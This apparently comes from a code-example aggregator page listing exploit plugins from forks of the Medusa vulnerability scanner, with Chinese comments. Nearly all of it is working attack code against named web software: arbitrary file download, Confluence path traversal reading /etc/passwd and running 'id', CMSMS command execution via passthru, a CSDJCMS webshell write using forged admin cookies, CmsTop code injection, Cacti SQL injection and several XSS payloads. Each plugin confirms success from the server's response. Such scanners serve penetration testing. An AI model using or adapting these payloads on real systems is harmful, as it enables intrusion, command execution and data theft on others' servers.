Arquivo: CyberwisdomArbitraryFileDownloadVulnerability.py Projeto: wcxxxxx/Medusa

def medusa(Url,RandomAgent,UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
        payload_url = scheme + "//" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('log4jConfigLocation') != -1 :
            Medusa = "{}存在汇思软件任意文件下载漏洞\r\n验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 20

Arquivo: AtlassianConfluencePathTraversalAndCommandExecutionVulnerability.py Projeto: sobinge/Medusa

def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    data = '''{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}'''
    data2 = '''{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"id"},"body":""}}'''
    Payload = "/rest/tinymce/1/macro/preview"
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
    Referers = scheme + "://" + url + ':' + str(port)
    headers = {
        'Accept': 'text/plain, */*; q=0.01',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'User-Agent': RandomAgent,
        'X-Requested-With': 'XMLHttpRequest',
        'Accept-Encoding': 'gzip, deflate, br',
        'Content-Type': 'application/json; charset=utf-8',
        'Referer': Referers,
        'Connection': 'keep-alive'
    }
    try:
        resp = requests.post(PayloadUrl,
                             data=data,
                             proxies=proxies,
                             headers=headers,
                             timeout=5)
        resp2 = requests.post(PayloadUrl,
                              data=data2,
                              proxies=proxies,
                              headers=headers,
                              timeout=5)
        con = resp.text
        con2 = resp2.text
        code = resp.status_code
        code2 = resp2.status_code
        if (code == 200 and con.lower().find('bin') != -1
                and con.lower().find('root') != -1) or (
                    code2 == 200 and con2.lower().find('uid=') != -1
                    and con2.lower().find('gid=') != -1):
            Medusa = "{}存在AtlassianConfluence路径穿越与命令执行漏洞 \r\n漏洞详情:\r\nPOST:{}\r\n返回内容:{}\r\n".format(
                url, data2, data, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类

Exemplo n.º 21

def medusa(Url, RandomAgent, Token, proxies=None):
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Content-Length": "115",
            "Connection": "close",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        }
        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      proxies=proxies,
                      timeout=6,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if con.find('''{"response":"Success","details":"}''') != -1:
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 22

Arquivo: CSDJCMSGetshell.py Projeto: reject404/Medusa

def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        referer = scheme + "://" + url
        headers = {
            "Host": "{}".format(url),
            "User-Agent": RandomAgent,
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer":
            "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie":
            "S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "169"
        }
        data = "FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5"
        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        if con.find('PHP Version') != -1 and con.find('System'):
            Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 23

Arquivo: CSDJCMSStoredCrossSiteScriptingVulnerability.py Projeto: thinks520/Medusa

def medusa(Url, RandomAgent, ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/user/do.php?ac=edit@op=zl"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        referer = scheme + "://" + url
        headers = {
            "User-Agent": RandomAgent,
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer":
            "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie":
            "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "169"
        }
        data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/'xss'/)>"
        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        if con.find('PHP Version') != -1 and con.find('System'):
            Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious表示严重，High表示高危，Intermediate表示中危，Low表示低危
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 24

Arquivo: CmsTopRemoteCodeExecution.py Projeto: thinks520/Medusa

def medusa(Url,RandomAgent,ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    payloadurl = scheme + "://" + url + ":" + str(port) + payload
    payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    domain_name = ".".join(url.split(".")[1:])
    payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2
    Payloads = [payloadurl,payloadurl2]
    Medusas = []  # 存放返回数据

    for payload_url in Payloads:
        try:
            headers = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }
            s = requests.session()
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if code== 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 :
                Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
                _t=VulnerabilityInfo(Medusa)
                web=ClassCongregation.VulnerabilityDetails(_t.info)
                web.High() # serious表示严重，High表示高危，Intermediate表示中危，Low表示低危
                ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果

        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

    if len(Medusas) != 0:
        result = ""
        for i in Medusas:
            result = result + i + "\n"
        return (str(result))

Exemplo n.º 25

Arquivo: CactiSQLInjectionVulnerability.py Projeto: zsdlove/Medusa

def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cdef.php?action=actions"
        data = "selected_items=a:1:{i:0;s:31:" ',benchmark(10000000,md5(c)),' ";}&drp_action=1 "
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.post(payload_url,
                      headers=headers,
                      data=data,
                      timeout=6,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
            Medusa = "{}存在CactiSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # 写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 26

Arquivo: CMSMSStoredCrossSiteScriptingVulnerability.py Projeto: syadg123/Medusa-

def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("cscanhyhm2n")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('cscanhyhm2n') != -1:
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 27

Arquivo: CMSMSCrossSiteScriptingVulnerability.py Projeto: thinks520/Medusa

def medusa(Url, RandomAgent, ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert(cscan-hyhmnn)%3e&submit=Submit'''
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('cscan-hyhmnn') != -1:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.Low()  # serious表示严重，High表示高危，Intermediate表示中危，Low表示低危
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 28

Arquivo: CmsTopPathDisclosureVulnerability.py Projeto: h3art3ars/Medusa

def medusa(Url, RandomAgent, ProxyIp):
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    Payloads = [
        "/cmstop/apps/system/view/template/edit.php",
        "/apps/system/view/template/edit.php"
    ]
    Medusas = []  #存放返回数据
    for payload in Payloads:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            headers = {
                'User-Agent':
                RandomAgent,
                'Content-Type':
                'application/x-www-form-urlencoded',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }
            s = requests.session()
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            if con.find(' in <b>([^<]+)</b> on line <b>(\\d+)</b>') != -1:
                Medusa = "{}存在CmsTop文件路径漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # serious表示严重，High表示高危，Intermediate表示中危，Low表示低危
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # 写入文件，url为目标文件名统一传入，Medusa为结果
        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名

Exemplo n.º 29

Arquivo: MedusaScan.py Projeto: securityname12/Medusa

def San(Pool,Module,ActiveScanId,Uid,Headers,Url):
    #POC模块存进多进程池，这样如果批量扫描会变快很多
    #主动扫描在这个位置对URL进行处理
    #如果插件中有需要固定端口的，后面写一个正则替换端口即可
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    Url=scheme + "://" + url + ":" + str(port)#处理后的URL
    if Module==None:
        print("\033[32m[ + ] Scanning across modules:\033[0m" + "\033[35m AllMod             \033[0m")
        for MedusaModule in MedusaModuleList:
            MedusaModuleList[MedusaModule](Pool,ActiveScanId=ActiveScanId,Uid=Uid,Headers=Headers,Url=Url,Proxies=proxies)  # 调用列表里面的值
    else:
        try:
            MedusaModuleList[Module](Pool, ActiveScanId=ActiveScanId,Uid=Uid,Headers=Headers,Url=Url,Proxies=proxies)  # 调用列表里面的值
        except:  # 如果传入非法字符串会调用出错
            print("\033[31m[ ! ] Please enter the correct scan module name\033[0m")
            os._exit(0)  # 直接退出整个函数
    Pool.Start(ProcessNumber)#启动多进程

Exemplo n.º 30

def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/k/cms/cmsmadesimple/install/index.php"
        data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        resp = requests.post(payload_url,
                             data=data,
                             headers=Headers,
                             proxies=proxies,
                             timeout=6,
                             verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find(
                '''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>'''
        ) != -1:
            Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类